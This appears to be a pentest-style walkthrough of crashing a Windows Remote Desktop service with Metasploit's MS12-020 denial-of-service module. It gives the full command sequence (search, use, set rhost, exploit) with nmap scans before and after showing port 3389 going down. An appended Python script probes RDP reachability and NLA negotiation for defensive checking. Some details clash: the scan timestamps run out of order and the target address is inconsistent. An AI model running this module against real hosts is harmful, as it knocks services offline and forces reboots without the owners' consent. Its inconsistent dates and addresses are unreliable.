3389/tcp open ms-term-serv auxiliary/dos/windows/rdp/ms12_020_maxchannelids

Caution: this simply causes the remote machine to reboot and stops RDP from working.

To restart RDP you need to go to System Properties and untick Remote Desktop, click Apply, then re-tick Remote Desktop and click Apply again.

Proving that 3389/tcp (ms-term-serv) is available:

Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-25 13:13 BST
Nmap scan report for IP-Address
Host is up (0.00028s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1027/tcp open  IIS
3389/tcp open  ms-term-serv
MAC Address: 01:02:03:79:41:21 (Micky Mog)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

Next, select the auxiliary module for the RDP service on 3389/tcp and set rhost:

msf > search ms12-020

Matching Modules
================

Name                                              Disclosure Date  Rank    Description
----                                              ---------------  ----    -----------
auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2011-03-16       normal  MS12-020 Microsoft Remote Desktop Use-After-Free DoS

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf  auxiliary(ms12_020_maxchannelids) > set rhost IP-Address
rhost => IP-Address

msf  auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.255.245.136:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.255.245.136:3389 - 210 bytes sent
[*] 10.255.245.136:3389 - Checking RDP status...
[+] 10.255.245.136:3389 seems down
[*] Auxiliary module execution completed

-----------------------------------------------------------------------------------------

nmap now shows that port 3389/tcp (ms-term-serv) is no longer available:
msf  auxiliary(ms12_020_maxchannelids) > nmap IP-Address --open -sS
[*] exec: nmap IP-Address --open -sS

Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-05-25 13:10 BST
Nmap scan report for IP-Address
Host is up (0.00064s latency).
Not shown: 977 closed ports, 20 filtered ports
PORT     STATE SERVICE
23/tcp   open  telnet
25/tcp   open  smtp
1028/tcp open  unknown
MAC Address: 01:02:03:79:41:21 (Micky Mog)

Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds
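The before/after check above relies on nmap's port state. As an added example (not part of the original post), the following script performs the same reachability check at the RDP protocol level: it sends the X.224 Connection Request that RDP clients open with and parses the Connection Confirm, so it reports whether a real RDP listener answers and which security layer it negotiates. Microsoft's MS12-020 bulletin listed requiring Network Level Authentication (CredSSP) as a mitigating factor, so the negotiated protocol is useful when verifying a fix. The host and port are assumed; the sample responses in the comments are constructed.

```python
"""RDP reachability probe: TPKT + X.224 Connection Request / Confirm parsing (added example)."""
import socket
import struct

# requestedProtocols / selectedProtocol values from MS-RDPBCGR
PROTOCOL_NAMES = {0: "standard RDP security", 1: "TLS", 2: "CredSSP (NLA)", 8: "RDSTLS"}


def build_connection_request(request_protocols=0x3):
    """Build the 19-byte TPKT-framed X.224 CR carrying an RDP_NEG_REQ (TLS | CredSSP)."""
    # RDP_NEG_REQ: type 0x01, flags 0, length 8, requestedProtocols (all little-endian)
    neg_req = struct.pack("<BBHI", 0x01, 0x00, 0x0008, request_protocols)
    # X.224 CR TPDU: LI, code 0xE0, DST-REF, SRC-REF, class 0, then the negotiation request
    x224 = struct.pack(">BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    # TPKT header: version 3, reserved, total length including this header
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    """Describe an X.224 Connection Confirm; raise ValueError if the bytes are not one."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed response")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length mismatch")
    if data[5] != 0xD0:  # X.224 CC TPDU code
        raise ValueError("not an X.224 Connection Confirm")
    result = {"rdp": True, "negotiation": False, "selected_protocol": None, "failure_code": None}
    if len(data) >= 19:  # legacy servers answer with an 11-byte CC and no negotiation block
        neg_type, _flags, _length, value = struct.unpack("<BBHI", data[11:19])
        result["negotiation"] = True
        if neg_type == 0x02:  # RDP_NEG_RSP
            result["selected_protocol"] = PROTOCOL_NAMES.get(value, hex(value))
        elif neg_type == 0x03:  # RDP_NEG_FAILURE, e.g. 0x05 = HYBRID_REQUIRED_BY_SERVER
            result["failure_code"] = value
    return result


def probe_rdp(host, port=3389, timeout=3.0):
    """Connect, send the CR and parse the CC; return None if nothing RDP-like answers."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_connection_request())
            return parse_connection_confirm(sock.recv(64))
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    # IP-Address is a placeholder, as in the post above
    print(probe_rdp("IP-Address"))
```

A result of None after running the module corresponds to the "seems down" state shown above; a dict with "selected_protocol" set to "CredSSP (NLA)" shows the server is back and negotiating NLA.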
